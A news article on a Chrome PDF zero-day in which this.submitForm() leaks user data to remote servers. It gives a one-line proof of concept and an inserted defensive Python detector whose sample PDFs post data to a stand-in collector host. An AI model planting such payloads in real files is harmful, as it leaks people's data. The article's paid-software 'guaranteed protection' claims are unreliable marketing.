Chrome bug lets hackers collect user data via PDF files

by Milan Stanojevic
Deputy Editor

  • EdgeSpot discovered an intriguing zero-day vulnerability exploiting PDF documents in Chrome.
  • Hold hackers at bay and keep your sensitive data safe using the PRO version of Adobe Acrobat. Consider adding a VPN service as well for extra protection.

Exploit detection service EdgeSpot discovered an intriguing Chrome zero-day vulnerability exploiting PDF documents. The vulnerability allows attackers to harvest sensitive data using malicious PDF documents opened in Chrome. 

As soon as the victim opens the respective PDF files in Google Chrome, a malicious program starts working in the background by collecting user data.

The data is then forwarded to a remote server controlled by the attackers. They target the following data on your PC:

  • IP address
  • Full path of the PDF file on the system
  • OS and Chrome versions

Beware of malware-ridden PDF files

You might be surprised to know that nothing happens when Adobe Reader is used for opening PDF files. Additionally, HTTP POST requests are used to transfer data to remote servers without any user intervention.

Experts spotted that one of the two domains readnotify[.]com or burpcollaborator[.]net was receiving the data.

What makes the attack more serious is that most antivirus software is not able to detect the samples found by EdgeSpot.

Experts reveal that the attackers are using the this.submitForm() PDF JavaScript API to collect users' sensitive information.

We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal data to google.com.
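A defender's triage check for the pattern described above, as an added example that is not EdgeSpot's or this article's code: it scans a PDF's raw bytes and its Flate-compressed streams for this.submitForm() calls and lists the destination URLs. The sample documents and the collector.example host are constructed for illustration; hex-encoded strings and other stream filters are not handled.

```python
import re
import zlib

# submitForm("url") or submitForm({cURL: "url", ...}); captures the quoted URL.
SUBMIT_RE = re.compile(
    rb"submitForm\s*\(\s*(?:\{[^}]*?cURL\s*:\s*)?[\"']([^\"']+)[\"']"
)
# Body of every PDF stream object (may be compressed).
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)


def _views(data: bytes):
    """Yield the raw file bytes, then each stream body that inflates cleanly."""
    yield data
    for match in STREAM_RE.finditer(data):
        try:
            # decompressobj tolerates the trailing newline before 'endstream'.
            yield zlib.decompressobj().decompress(match.group(1))
        except zlib.error:
            continue  # not Flate data; the raw view already covers it


def find_submit_targets(data: bytes) -> list[str]:
    """Return the URLs passed to submitForm() anywhere in the document."""
    targets: list[str] = []
    for view in _views(data):
        # PDF literal strings escape parentheses as \( and \).
        view = view.replace(b"\\(", b"(").replace(b"\\)", b")")
        for match in SUBMIT_RE.finditer(view):
            url = match.group(1).decode("latin-1")
            if url not in targets:
                targets.append(url)
    return targets


# Constructed samples: one plain /JS action, one script in a Flate stream.
SAMPLE_PLAIN = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /S /JavaScript "
    b"/JS (this.submitForm\\('http://collector.example/t'\\)) >>\nendobj\n"
)
_JS = b'this.submitForm({cURL: "http://collector.example/c", cSubmitAs: "HTML"});'
SAMPLE_FLATE = (
    b"%PDF-1.4\n3 0 obj\n<< /Filter /FlateDecode >>\nstream\n"
    + zlib.compress(_JS) + b"\nendstream\nendobj\n"
)

if __name__ == "__main__":
    for name, doc in (("plain", SAMPLE_PLAIN), ("flate", SAMPLE_FLATE)):
        print(name, find_submit_targets(doc))
```

To check a real file, pass its contents as bytes: `find_submit_targets(open(path, "rb").read())`. An empty list only means that no readable submitForm() call was found.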

The experts found that this Chrome bug was being exploited by two distinct sets of malicious PDF files. They were circulated in October 2017 and September 2018, respectively.

Notably, the collected data can be used by the attackers to fine-tune attacks in the future. Reports suggest that the first batch of files was compiled using ReadNotify’s PDF tracking service.

Users of the service can use it to keep track of user views. EdgeSpot has not shared any details regarding the nature of the second set of PDF files.

How to Stay Protected

Adobe and Chrome make a good match when it comes to handling PDF files. By installing the Adobe Extension for Chrome, you can review and manipulate PDFs to your liking without leaving your favorite browser.

Despite the Reader's robust structure, malware hidden in PDF files might not get detected if you're using the standard version.

The professional version is recommended to guarantee your protection and keep your data away from hackers. Although it is not free of charge, the price is rather small for the plethora of additional features you will enjoy, including the enhanced security of your PDF files.

There is also a 7-day free trial included so that you can get a taste of the full Pro experience before making the purchase.


If you want to be secure while surfing the internet, you will need a fully dedicated tool to secure your network. Install Cyberghost VPN now and secure yourself. It protects your PC from attacks while browsing, masks your IP address, and blocks all unwanted access.


The exploit detection service EdgeSpot wanted to alert Chrome users about the potential risks because a patch was not expected to be released in the near future.

EdgeSpot reported the vulnerability to Google last year, and the company promised to release a patch in late April. In the meantime, you can use a temporary workaround: view received PDF documents locally in an alternative PDF reader app.

Alternatively, you can open your PDF documents in Chrome after disconnecting your system from the Internet.

FAQ: Learn more about Chrome extensions

  • Does Privacy Badger work with Chrome?

Privacy Badger is the most popular privacy extension for Chrome (among other browsers), plus it’s free and open-source. Browsec VPN and ZenMate VPN are also good choices. Feel free to explore our top picks for Chrome privacy extensions in this complete guide.

  • Can you edit PDFs in Chrome?

Chrome is a versatile browser that you can easily enhance with a wide range of extensions to edit and save PDF files online. From Adobe Acrobat Reader to PDFescape, there are a lot of options when it comes to extensions that allow PDF processing. Check out our full guide on this topic.

  • Does Google have a QR code generator?

You can use the dedicated extension in Google Chrome. To do this, open the QR Code Extension page and click on Add to Chrome. Alternatively, you can enter chrome://flags/#sharing-qr-code-generator in the URL bar and select Enabled on the drop-down menu for the Enable sharing page via QR Code setting.

Editor’s Note: This post was originally published in March 2019 and has been since revamped and updated in April 2020 for freshness, accuracy, and comprehensiveness.